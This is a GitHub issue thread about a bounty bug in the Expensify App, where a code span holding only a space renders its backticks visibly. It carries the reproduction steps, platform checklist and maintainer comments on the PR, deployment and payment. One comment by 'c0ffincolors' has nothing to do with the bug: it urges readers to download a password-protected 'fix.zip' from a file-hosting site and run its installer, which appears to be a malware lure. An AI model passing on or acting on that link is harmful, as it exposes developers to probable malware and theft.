### ISSUE TITLE
[$250] Incorrect parsing for backticks with a space in between them

### ISSUE THREAD

**Issue by dangrous** [Expensify/App#48101]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:**
**Reproducible in staging?:** yes
**Reproducible in production?:** yes
**If this was caught during regression testing, add the test name, ID and link from TestRail:**
**Email or phone of affected tester (no customers):**
**Logs:** https://stackoverflow.com/c/expensify/questions/4856
**Expensify/Expensify Issue URL:**
**Issue reported by:** 
**Slack conversation:** not Slack but https://github.com/Expensify/App/issues/46917#issuecomment-2294328303

## Action Performed:
1. Send the following input:
```
it uses`;`separated fields because the line number column could have`:`in them ` ` with space
```

## Expected Result:
The input should look like

it uses`;`separated fields because the line number column could have`:`in them ` ` with space

(The space at the end is in a code block)

## Actual Result:
The input looks like

![image](https://github.com/user-attachments/assets/90b15258-134d-40f6-b907-a7eb0caafeed)

(The space at the end is not in a code block, the backticks are visible)

## Workaround:
Can the user still use Expensify without this being fixed? Have you informed them of the workaround?

Yes

## Platforms:

Which of our officially supported platforms is this issue occurring on?
- [X] Android: Native
- [X] Android: mWeb Chrome
- [X] iOS: Native
- [X] iOS: mWeb Safari
- [X] MacOS: Chrome / Safari
- [X] MacOS: Desktop

## Screenshots/Videos

Add any screenshot/video evidence

See above.
</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~01e928bacaaf9c0339</li>
        <li>Upwork Job ID: 1831034909462647027</li>
        <li>Last Price Increase: 2024-09-03</li>
<li>Automatic offers: </li>
<ul>
<li>hoangzinh | Reviewer | 103821976</li>
<li>tsa321 | Contributor | 103821978</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @hoangzinh</details>

**Comment by dangrous** [comment]
The parsing is actually wonkier than this on staging/prod so this bug isn't visible yet, but it will be when THAT parsing is fixed by https://github.com/Expensify/App/pull/47838. Making this so I don't forget, but no action at the moment @muttmuure!

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dangrous** [comment]
almost ready to open this up officially, PR is merged but not yet deployed

**Comment by muttmuure** [comment]
Will wait until we need an external contributor

**Comment by muttmuure** [comment]
Not overdue

**Comment by dangrous** [comment]
Okay we're ready to go on this one, will make it external

**Comment by deetergp** [comment]
@muttmuure I think our automations failed to update, but the PR for this issue has been deployed to production.

**Comment by dangrous** [comment]
I think @muttmuure is still on leave, I'll reapply the label

**Comment by anmurali** [comment]
Paid.
